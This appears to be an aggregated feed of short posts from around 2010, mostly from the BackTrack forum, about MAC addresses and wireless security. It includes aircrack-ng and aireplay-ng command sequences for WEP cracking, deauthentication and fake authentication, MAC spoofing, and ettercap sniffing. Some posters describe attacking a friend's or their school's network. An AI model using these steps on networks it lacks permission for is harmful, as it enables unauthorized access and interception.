root@bt:~# ifconfig wlan0 up
(To be Continued)
-
-
15:19
»
remote-exploit & backtrack
I recently installed BackTrack 4 on my macbook pro. While the installation for backtrack completed successfully, the mac side had an error. When partitioning the hard drive, I made the BackTrack 4 the root and left the mac side of the hard drive to the default that it had been set at. After installing BackTrack the mac side of the computer was not seen. When looking at the partition in BackTrack I saw that the mac side was not recognizable. I do not think the partition was wiped clean, but at the same time, I have no idea how to get it back and running. Any help is greatly appreciated!
-
-
10:06
»
remote-exploit & backtrack
Hi bt users
I am doing an experiment in which i am trying to get an energy saving protocol in 802.11 MAC layer
i am using orinocco cards in ad-hoc mode and 2 computers with ubuntu 8.10
i am planning to switch over to bt4 as i need to dump the packets and then analyse them for throughput etc..
i am using tcpdump/wireshark for this
next stage i am going to fix the power of both the cards and vary the distances and analyse the loss in packets..
can someone recommend me utilities specifically in bt4
lastly i am planning to make one node as master and inject the protocol using some utility..please recommend me utilities to achieve my experiment..
thanx in advance
-
-
17:00
»
Packet Storm Security Recent Files
ARP Sniff (Sniffer Lite) is a tiny ARP sniffer. This tool will be useful to analyze the ARP packets in the network. The tool gives out two types of information, the 14 byte Ethernet header and 28 byte ARP header. The tool requires G++ compiler and a libpcap package. Three arguments are coded as of now. One is to list the available devices, second is to sniff the default device and third is to sniff the device given as argument. The sniffer outputs the Ethernet header (Source MAC address, Destination MAC address and Ethernet type), ARP Header (Hardware type, Protocol type, Hardware address length, Protocol address length, Opcode, Source Hardware address and Protocol address, Destination hardware address and Protocol address).
-
17:00
»
Packet Storm Security Exploits
ARP Sniff (Sniffer Lite) is a tiny ARP sniffer. This tool will be useful to analyze the ARP packets in the network. The tool gives out two types of information, the 14 byte Ethernet header and 28 byte ARP header. The tool requires G++ compiler and a libpcap package. Three arguments are coded as of now. One is to list the available devices, second is to sniff the default device and third is to sniff the device given as argument. The sniffer outputs the Ethernet header (Source MAC address, Destination MAC address and Ethernet type), ARP Header (Hardware type, Protocol type, Hardware address length, Protocol address length, Opcode, Source Hardware address and Protocol address, Destination hardware address and Protocol address).
-
-
10:33
»
Hack a Day
[Jake Howe] brought his 1984 Mac up-to-date by cramming new guts inside of the classic case. The goal from the start was to run OS X Snow Leopard on the machine without altering the externals. He heated and formed acrylic around the original CRT screen to make a bezel for the replacement LCD screen. The [...]
-
-
13:07
»
remote-exploit & backtrack
Problem with station mac because it withdraws five with six why in one bssid
-
10:03
»
remote-exploit & backtrack
salut,
est ce que on peut cracker un clé wep lorsque le routeur cible utilise un filtrage d'adresse MAC .
merci d'avance .
-
-
16:57
»
remote-exploit & backtrack
How do I retrieve the client MAC from my cap file?
I'm using "airodump-ng -c 11 --bssid 00:11:22:33:44:55 -w output-home mon0" to filter by the AP I'm monitoring.
Apparently a client connected, because I see that I have collected 75 IVs, but I didn't see the client MAC (I'm assuming it refreshed out, or whatever) by the time I saw the data numbers. So, I'm hoping to get the client MAC from the cap file.
Feel free to point me to a related post, but I didn't find one via search.
Thanks!
-
10:57
»
remote-exploit & backtrack
hi all
i have a little question!
we've setup a AP with wep shared key and i consumed that a hacker may have my wep !!
so we decided to limit the MAC address of the wireless cards !
is there any way that someone can fake this MACs or bypass this limitation anyway?
i read that if this limitation presents! with a tcpdump command it is possible to notice
this by getting deauth result, so i want to know can this limitation protect my AP?!
-
-
9:11
»
remote-exploit & backtrack
provato a recuperare la key in modo senza cliente ( dati non sono reali ma precisi nei vari comandi)
airodump-ng -c 11 -b 00:1A:C1:15:BE:34 -w cap mon0
CH 11 ][ Elapsed: 3 mins ][ 2010-02-26 13:34
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH E
00:1A:C1:15:BE:34 -74 100 1986 0 0 11 54 . WEP WEP OPN 3
BSSID STATION PWR Rate Lost Packets Probes
fin qua tutto ok nessun clinte attacco chopchop
aireplay-ng -1 0 -a 00:1A:C1:15:BE:34 -h 00:E0:4C:05:1A:32 mon0 comando per associare
13:31:11 Waiting for beacon frame (BSSID: 00:1A:C1:15:BE:34) on channel 11
13:31:11 Sending Authentication Request (Open System) [ACK]
13:31:11 Authentication successful
13:31:11 Sending Association Request [ACK]
13:31:11 Association successful :-) (AID: 1)
fin qua tutto ok almeno secondo il mio parere.
aireplay-ng -4 -b 00:1A:C1:15:BE:34 -h 00:E0:4C:05:1A:32 mon0
13:31:29 Waiting for beacon frame (BSSID: 00:1A:C1:15:BE:34) on channel 11
^Cad 1502 packets...
Qui penso che ci sia un problema non avrebbe dovuto crearmi un finestra differente e poi confermare con Y invece e partita senza domandarmi niente e girare cosi all'infinito ?
avrebbe dovuto risponder cosi :
Read 165 packets...
Size: 86, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:14:6C:7E:40:80
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:40:F4:77:E5:C9
0x0000: 0842 0000 ffff ffff ffff 0014 6c7e 4080 .B..........l~@.
0x0010: 0040 f477 e5c9 603a d600 0000 5fed a222 .@.w..`:...._.."
0x0020: e2ee aa48 8312 f59d c8c0 af5f 3dd8 a543 ...H......._=..C
0x0030: d1ca 0c9b 6aeb fad6 f394 2591 5bf4 2873 ....j.....%.[.(s
0x0040: 16d4 43fb aebb 3ea1 7101 729e 65ca 6905 ..C...>.q.r.e.i.
0x0050: cfeb 4a72 be46 ..Jr.F
Use this packet ? y
-
-
7:04
»
remote-exploit & backtrack
hi all
i tried to crack a friends WEP encrypted AP with airocrack-ng (command line , if any GUI exist plz let me know)
i use this command :
sudo airmon-ng start wlan0 5
sudo airodump-ng --ivs -w Erix -c 5 wlan0
sudo aireplay-ng -5 -b 00:00:00:00:00:00 -h 00:00:00:00:00:00 wlan0
sudo aireplay-ng -1 0 -e Torkanet -a 00:00:00:00:00:00 -h00:00:00:00:00:00 wlan0
(MAC addresses is diffrent but Ap is Torkanet :D & it is on channel 5)
this is when no clients present!
and this commands when we use a clients :
sudo airmon-ng start wlan0 5
sudo airodump-ng --ivs -w Erix -c 5 wlan0
sudo aireplay-ng -0 10 -a 00:00:00:00:00:00 -c 00:00:00:00:00:00 wlan0
sudo aireplay-ng -3 -b 00:00:00:00:00:00 -h 00:00:00:00:00:00 wlan0
the problem is when aircrack-ng gots packegs it said ".....still nothing tring another package" it done this over and over and over till i ran low on physical memory :D!! what should i do?
is our network secured enough?
and other silly question is :D on this command :
sudo aireplay-ng -5 -b 00:00:00:00:00:00 -h 00:00:00:00:00:00 wlan0
which MAC address is mine and which is for Ap? (the same question goes for -3 option!!)
by the way sry for my weak english!!:D
-
-
12:00
»
Hack a Day
[Robert] wrote a program using Max/MSP that lets him make music with his guitar hero controller. There’s another video after the break where he walks through the various features but here’s the gist of it. This works on Mac and Windows and allows a sort of ‘live play’ or midi mapping mode. In the midi [...]
-
-
18:13
»
remote-exploit & backtrack
Okay, so i've been searching for about 2 days and can't find a solution... It's getting frustrating. The things I have found aren't very user friendly in explanation or seem to be really out dated. I have a MacBook Pro running BT4 Final and can't get the right click working. Have tried messing with the xorg.conf file and just can't seem to get it exactly. Any help or links to some place that would explain it in the least confusing fashion would be awesome. :) Thanks in advance for any help.
-
-
14:51
»
remote-exploit & backtrack
I am having a little problem with capturing my WPA Handshake NOTE: This is for MY Home network. I have even tried turning the connected computer off and unplugging it from the router also turning the router off and back on NOTHING Works I simply can not capture MY Handshake I attend college as a Network Admin where I captured My schools handshake but I believe this is because there are always lots of people connected to the network i cant remember if i even had to deauth a computer although now i think of it I believe I did as well as spoofed my mac NOTE: I am not spoofing my MAC for my home network. can someone please help
-
-
0:00
»
remote-exploit & backtrack
Ok,.. So I got a pickle here and wanted to know if anyone ran into this,..
Went with verizon fios and they have there own routers cause I am amusing fiber optics? For giggles I tried to crack the new router at my house and it won't let me inject into it.. Works fine for my linksys one but for some reason there router seems to be a something new. There is something also new, you know it tells you the speed of the connection? like 54(Mps)? Well it says 54e.
Wait did some research,.. is this a case if mac address filtering? if so how do I adapt?
Also does that e mean that there is in fact mac address filtering going on?
-
-
8:33
»
remote-exploit & backtrack
slt
Je voudrait savoir que vous penser de mon niveau de sécurité wifi de ma freebox.
j'utilise une cle wifi WPA (TKIP + AES) 63 caractères générer en aléatoire.
De plus j'ai activer le router et j'ai autorise un DHCP de 12 adresse utilise par tout mes appareille wifi.
Et pour chacune des adresses IP j'ai réserver une adresse MAC de chacun de mes appareille.
Donc aucune adresse IP n'est disponible en adresse MAC inconnu.
Penser que c'est possible de cracker mon réseau sans connaitre mes adresses mac? Ces adresse mac peuvent elle être trouver a distance?
Merci
-
8:20
»
remote-exploit & backtrack
slt
Je voudrait savoir que vous penser de mon niveau de sécurité wifi de ma freebox.
j'utilise une cle wifi WPA (TKIP + AES) 63 caractères générer en aléatoire.
De plus j'ai activer le router et j'ai autorise un DHCP de 12 adresse utilise par tout mes appareille wifi.
Et pour chacune des adresses IP j'ai réserver une adresse MAC de chacun de mes appareille.
Donc aucune adresse IP n'est disponible en adresse MAC inconnu.
Penser que c'est possible de cracker mon réseau sans connaitre mes adresses mac? Ces adresse mac peuvent elle être trouver a distance?
Merci
-
-
23:59
»
remote-exploit & backtrack
Dear back|track users,
I have been experiencing a problem:
Previous search terms -
Searched google and BT for terms along the lines of:
mac spoof(ing) aireplay fake auth(entication) deauthentication packet
and any combination of those, but have not found a definitive answer that addresses the difficulty I'm experiencing.
Platform -
back|track4 pre-final live USB
card1: intel 5100 (bleeding edge driver from dec 2009)
card2: alfa AWUS036H (native rtl8187 drivers from BT4-prefinal)
target AP: Personal D-link router WBR-1310 (10 ft away)
NO MAC filtering set on target AP, WEP enabled
Description of problem:
Boot up BT4
airmon-ng start wlan0 (for alfa)
airodump-ng -c 1 mon0 (to fix the channel at 1)
aireplay-ng -1 0 -a $AP mon0 (attempt fake auth)
==> Fake auth success
change mac:
original mac: XX:XX:XX:XX:XX:BA
new mac : XX:XX:XX:XX:XX:BB (or any other change)
ifconfig wlan0 down; ifconfig mon0 down;
macchanger -m XX:XX:XX:XX:XX:BB wlan0
macchanger -m XX:XX:XX:XX:XX:BB mon0
ifconfig mon0 up;
airodump-ng -c 1 mon0
aireplay-ng -1 0 -a $AP mon0 (attempt fake auth)
==>
Sending Authentication Request (Open System) [ACK]
Authentication successful
Sending Association Request [ACK]
Got a deauthentication packet! (Waiting 3 seconds)
.
.
.
Got a deauthentication packet! (Waiting 5 seconds)
.
.
. etc.
This happens for both Intel 5100 and Alfa AWUS036H
When I attempt an attack on my office router (with permission, namely by me), the mac spoofing doesn't seem to result in dauthentication from router.
What can be done:
1) Injection test, aireplay-ng --test mon0, will result in successful injection on both spoofed mac and original mac
2) With original mac, most attacks on d-link are successful as per tutorials on this page and other sources, including attacks 2,3,4, and subsequent aircracks and dictionary/table attacks. Once connected and ARP poisoned, many other attacks also work as usual.
QUESTION:
+How can the router possibly know what my original mac address is? (Again, NO MAC filters on routers)
+Why does it allow fake auth if I use original mac, but denies authentication when I use other macs (both completely random, or pseudo random spoofing like changing the last digit) ?
+Is there a work around?
Thank you for taking time to read my question, I appreciate any questions regarding my setup or comments on how I can approach the problem.
C.
-
14:24
»
remote-exploit & backtrack
As the title stated, I am trying to find some facts about
WHICH USB Wifi N-Draft that is known to work with Backtrack installed on VMWare Fusion.
The USB N-Draft that I am looking are the ones that supports
BOTH 2.4Ghz and 5Ghz.
If someone has used a particular USB N-Draft Wifi for the above, could you share the brand, model and where you buy it?
Thanks!
-
-
4:33
»
SecDocs
Authors:
Fabian Yamaguchi Tags:
exploiting client side Event:
Chaos Communication Congress 26th (26C3) 2009 Abstract: We will be presenting a number of previously undisclosed network-related design errors, ranging from data-link-layer bugs in Ethernet-drivers across issues in TCP/IP stacks all the way up to communication infrastructure components on layer 5. Our focus is on subtle mistakes, which do not fall into the memory-corruption category and yet in combination provide an attacker with a powerful bag of tricks. Built around a fictional average company network, we will tell the story of an attack making use of subtle bugs across the layers all of which are as of yet undisclosed. This will include a bug in an Ethernet-driver, which allows an attacker to bypass MAC- and IP-based filters, bugs in TCP-implementations that are assumed to be fixed but aren't, a web-cache which confuses itself and an instant-messenger, which was fooled by the protocol specification. All of these bugs share a common property: They are a consequence of insecure design and not of insecure coding-practices.
-
4:33
»
SecDocs
Authors:
Fabian Yamaguchi Tags:
exploiting client side Event:
Chaos Communication Congress 26th (26C3) 2009 Abstract: We will be presenting a number of previously undisclosed network-related design errors, ranging from data-link-layer bugs in Ethernet-drivers across issues in TCP/IP stacks all the way up to communication infrastructure components on layer 5. Our focus is on subtle mistakes, which do not fall into the memory-corruption category and yet in combination provide an attacker with a powerful bag of tricks. Built around a fictional average company network, we will tell the story of an attack making use of subtle bugs across the layers all of which are as of yet undisclosed. This will include a bug in an Ethernet-driver, which allows an attacker to bypass MAC- and IP-based filters, bugs in TCP-implementations that are assumed to be fixed but aren't, a web-cache which confuses itself and an instant-messenger, which was fooled by the protocol specification. All of these bugs share a common property: They are a consequence of insecure design and not of insecure coding-practices.
-
-
9:18
»
remote-exploit & backtrack
I read the man pages of ettercap and it said the target can be in form of
MAC/IP/PORTS
Ok...
to all my dear darklords ...I have 2 basic questions..which , I request some help to :
<> I specify mac addresses /MAC/ /MAC2/ it says Invalid IP range. So how do you specify them or that's not allowed.
<>More imp one : I would like to SNIFF NOT ALL BUT JUST PACKETS OF PORTS # 80 AND 443 FOR SPECIFIC IP RANGE.
I thought his would convey the information :
ettercap <options> /IP:port1,port2/ /IP2:Port1,port2/
but it does not like that format too.
Can someone please lemme know if that is poss and how .
MANY THANKS
S
-
-
6:01
»
remote-exploit & backtrack
How to connect to your phone via Bluetooth to access Internet
by:MWood
this is not 100% foolproof, but works for me.
My provider is DNA Finland, your chatscript line
may be different acording to your service description
Config your files:
/etc/bluetooth
-
edit
rfcomm.conf and
main.conf
/etc/bluetooth/rfcomm.conf
#
# RFCOMM configuration file.
#
rfcomm0 {
# # Automatically bind the device at startup
bind yes;
#
# # Bluetooth address of the device
device 00:26:CC:8A:24:59;
#
# # RFCOMM channel for the connection
channel 1;
#
# # Description of the connection
comment "Dial-Up Networking";
}
/etc/bluetooth/main.conf
[General]
# List of plugins that should not be loaded on bluetoothd startup
#DisablePlugins = network,input
# Default adaper name
# %h - substituted for hostname
# %d - substituted for adapter id
#Name = %h-%d
Name = YOUR_BOX
# Default device class. Only the major and minor device class bits are
# considered
#Class = 0x000100
Class = 0x0a010c
# run "hciconfig hci0 class"
# How long to stay in discoverable mode before going back to non-discoverable
# The value is in seconds. Default is 180, i.e. 3 minutes.
# 0 = disable timer, i.e. stay discoverable forever
DiscoverableTimeout = 0
# Use some other page timeout than the controller default one
# (16384 = 10 seconds)
PageTimeout = 8192
# Behaviour for Adapter.SetProperty("mode", "off")
# Possible values: "DevDown", "NoScan" (default)
OffMode = NoScan
# Discover scheduler interval used in Adapter.DiscoverDevices
# The value is in seconds. Defaults is 0 to use controller scheduler
DiscoverSchedulerInterval = 0
/etc/ppp/peers
-
create a file "BluetoothDialup"
/etc/ppp/peers/BluetoothDialup
debug
noauth
connect "/usr/sbin/chat -v -f /etc/chatscripts/BluetoothDialup"
usepeerdns
/dev/rfcomm0 115200
defaultroute
crtscts
lcp-echo-failure 0
/etc/chatscripts
-
create a file "BluetoothDialup" ( yes the same name as above )
/etc/chatscripts/BluetoothDialup
TIMEOUT 35
ECHO ON
ABORT '\nBUSY\r'
ABORT '\nERROR\r'
ABORT '\nNO ANSWER\r'
ABORT '\nNO CARRIER\r'
ABORT '\nNO DIALTONE\r'
ABORT '\nRINGING\r\n\r\nRINGING\r'
'' \rAT
OK 'AT+CGDCONT=1, "IP", "INTERNET"'
OK ATD*99#
CONNECT ""
note: the line
OK ATD*99# is your dialup number, mine is simply *99#
note: the line
OK 'AT+CGDCONT=1, "IP", "INTERNET"'
is very importaint, especially the "INTERNET" entry, this should
match your phones service. Mine is "dna INTERNET" on my phone, but
the correct info for the script is "INTERNET".
If you get an error about needed to subscribe to blahblah, you got it wrong!
/var/lib/YOUR_BT4_BLUETOOTHDEVICE_MAC/
-
create a file called "pincodes"
enter on one line...
YOUR_PHONES_MAC PIN
/var/lib/YOUR_BT4_BLUETOOTHDEVICE_MAC/pincodes
example:
00:11:22:33:44:55 1234
-
restart the bt daemon...
user@bt~#
/etc/init.d/bluetooth restart
to connect issue the command...
user@bt~#
pon BluetoothDialup
to disconnect issue the command....
user@bt~#
poff BluetoothDialup
problems:
If you have previously paired your phone in windows,
you may need to delete the old pairing,
then repair in BT4. Pairing will be from BT4->Phone
( accecpt request and PIN:1234 )
-
-
2:36
»
remote-exploit & backtrack
Hi,
I just got a simple question, that I could not answer, since I found the information anywhere...
Can an Ettercap filter be used for Layer 2 parameters? (MAC addresses)
I tried to create a filter using the parameters "eth.src and eth.dst" and etterfilter compiled it without problems. Anyway, once the filter is applied, it does not filter as desired...
thanks for the help!
best regards.
-
-
17:47
»
remote-exploit & backtrack
So I came across a 4 minute video on youtube on how to penetrate my own router. I have a Belkin router and I was able to do everything the fella in the video has done.
I use VMWare to run BT4. I type out everything he does but with my own info obviously. And this is what I see afterwards...
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Read 676863 packets (got 1 ARP requests and 19928 ACKs), sent 623247 packets...(499 pps)
I know nothing of what I am doing. It just looked easy and I happen to have a USB adapter. But whatever I am doing I had fun.
thanks
-
4:34
»
remote-exploit & backtrack
Buenas,
he instalado el BT4, porque necesito utilizar Ettercap para unos determinados tests de integridad en una red.
He probado varios filtros para alterar información IP y TCP y funcionan de lujo.
También quería alterar información de nivel dos (direcciones MAC, básicamente).
En el filtro defino varias condiciones dependientes de la MAC origen o MAC destino (eth.src o etc.dst). Me permite compilar el filtro y ejecutarlo, pero se salta las condiciones como le da la gana...
Alguien sabe a que puede ser debido?
gracias!
Hi everyone,
I have been looking throughout the forum and in Google, and have found nothing...that's why I post this new thread.
I am using ETTERCAP for testing some security and structural issues of a network.
I configured and compiled some filters for IP and HTTP traffic and worked with no problems.
The problems came when I tried to do Layer 2 (MAC address) filters. I did some filter conditions using
eth.src and
etc.dst, but it did not work. The filter compiled without problems, but the filter did not apply, even if the conditions were fulfilled (I made cross tests with sniffer and ethercap-filter messages).
Do I have to configure something special to make this filter work?
Thank you everyone for your help!
Hi,
I've looked in the documentation, but found nothing...
It is possible to introduce delays in the sent message using ettercap bridged sniffing?
thanks!
